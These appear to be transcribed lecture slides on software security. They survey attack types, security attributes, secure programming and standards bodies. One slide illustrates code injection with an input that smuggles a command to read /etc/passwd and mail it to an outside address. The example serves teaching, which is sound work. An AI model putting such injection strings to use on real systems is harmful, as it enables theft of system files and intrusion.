Transcript ISEC0511
ISEC0511
Programming for Information
System Security
Lecture Notes #2
Security in Software Systems
1
Vulnerability and Attacks
Vulnerability is a weak point in a
system. There several ways in which
vulnerabilities can be discovered.
Exploiting Vulnerability
Once a security vulnerability is known, how to
exploit it is also known.
What is not easily known is who has the device
with the vulnerability and how to reach it.
Scanning systems in the network is a way to
discover targets.
2
Vulnerability and Attacks
Passive Attacks
When a hacker eavesdrops on your system or
monitors the transmitted packets, it is a passive
attack.
Sensitive information such as credit card
information can be discovered using this
technique.
This is also called a sniffing attack.
3
Vulnerability and Attacks
Active Attacks
The original object is disturbed or manipulated.
The hacker can impersonate you and log into
the remote system as you.
Hacking
The process of exploiting vulnerabilities and
launching an attack on computers is called
hacking.
Hackers hack computers, networks, and
telephone systems for profit, sometimes even
for fun.
4
Vulnerability and Attacks
Social Engineering
Social engineering is a technique used by
adversaries to manipulate the social and
psychological behavior of people to gain access
to information or do something that they will
not do in a different social setup.
Identity Theft
This is in order to get financial identity,
personal identity, medical records, business or
commercial identity.
Phishing
E-mail scam
5
Various Security Attacks
Brute-Force Attacks
Try to find the right combination of
password or encryption key.
The attack is also used by researchers to
test the strength of encryption algorithm.
Key strength is exponential to key size.
6
Various Security Attacks
Authentication Attacks
In telecom network, a device is
authenticated.
In data network, a user is authenticated.
Dictionary Attack
Passwords should never be based on known
information.
The attack is also used to discover emails.
7
Various Security Attacks
Replay Attack
Password Guessing
Ali Baba did not know the meaning of this
phrase; he heard the bandits use.
In a replay attack, the adversary replays a
genuine message captured earlier to perform a
function intended for a legitimate user.
Knowing user ID is relatively easy.
It is likely that we have a common user ID and
password for many accounts (banks, ATM,
emails, credit cards)
Password Sniffing
8
Various Security Attacks
Spoofing attack
Spoofed IP
Spoofed emails
Spoofed SMS
Denial-of-Service Attacks
Distributed Denial-of-Service Attack
Half-Open Attack or SYN-Flooding
Denial of Service through User-ID Lock Attack
Ping of Death Attack
Smurf Attack
9
Various Security Attacks
Packet Sniffer
Tcpdump and Ethereal (Wireshark)
10
Taking Control of Application
To take control of applications, you
need to make user execute your code.
Overflow Attack
Stack Smashing Attack
Remote Procedure Call Attack
Code Injection Attacks
echo Welcome $1 $2 $3 $4
hi;cat /etc/passwd|mail [email protected]
Luring Attack
11
Computer Security
Physical Security
Operating System Security
Shell Security
File System Security
Kernel Security
Network Security
12
Typical Security in Data Network
13
Counter External Threats
Stopping Attacker
the application should use all possible
defenses to protect itself and all its data.
Firewall
Intrusion Detection System
Intrusion Prevention System
Honeypot
Penetration Test and Ethical Hacking
14
Security Programming
A programmer has a responsibility to
ensure that the code written is secure
and safe with minimum or no known
vulnerability.
Security bugs have a very high impact.
15
Security Attributes
Confidentiality
A mechanism through which we keep the
meaning of information or data secret.
This property is also known as privacy or
encryption.
Integrity
A property through which you can detect
whether your message or data have been
corrupted or tampered with.
16
Security Attributes
Availability
It is necessary that the service is available
for the period it is advertised.
Any attack on availability is called a DoS
attack.
17
Security Attributes
Authentication
Authentication is a process by which we
validate the identity of the parties.
In nonrepudiation we identify the identity
of these parties beyond any doubt.
Digital signatures can achieve
nonrepudiation.
One-factor authentication, Two-factor
authentication, Multi-factor authentication.
18
Security Attributes
Authorization
Usage constraints on objects based on
security level or privilege of the subject.
This attribute is also called fine-grained
access control or role-based security.
19
Security Attributes
Accounting
Accounting is the process by which the
usage of a service is metered.
Audit trails and logs for transactions in an
application can also be considered as part
of the accounting information.
These files need security so that
adversaries cannot tamper or delete them.
Anonymity
A property through which the user is
anonymous to the external world.
20
Secured Programming
In secured programming you use the
security attributes to ensure that the
input data are secure.
Also, you use these attributes to ensure
that the processed information is
secured.
You make the data and information
secure using security algorithms,
security protocols, and secured
programming.
21
Safe Programming
You as a programmer need to ensure
that whatever program you write does
not have any security vulnerability.
The bottom line is that the programs
you write need to be robust and
failsafe.
22
Vulnerability Remediation
To minimize the security risks posed by
software vulnerabilities, a two-step approach
is necessary.
First, minimize the number of vulnerabilities
in the software that is being developed, and
Second, minimize the number of
vulnerabilities in the software that have
already been deployed.
23
Vulnerability Remediation
Reducing the number of new
vulnerabilities in the new software is
the focus of secured and safe
programming, while removing existing
vulnerabilities is the focus of
vulnerability remediation.
24
Database Security
Database Authentication
Database Privileges
Secure Metadata
Customize Access to Information
Views and Stored procedures
High Availability Database
Database Encryption
25
Security Standards
Public-Key Cryptographic Standards
standards accepted as de facto standards for
public key cryptography helping interoperability
between applications using cryptography for
security.
CERT: Computer Emergency Response Team
– www.cert.org
OWASP: Open Web Application Security
Project) – www.owasp.org
26
Security Standards
NIST: National Institute of Standards
and Technology – crsc.nist.gov
OASIS: Organization for the
Advancement of Structured Information
Standards
SSE-CMM: System Security Engineering
Capability Maturity Model – www.ssecmm.org
ISO17799
27
Readings
Architecting Secure Software Systems,
Chapter 1.
28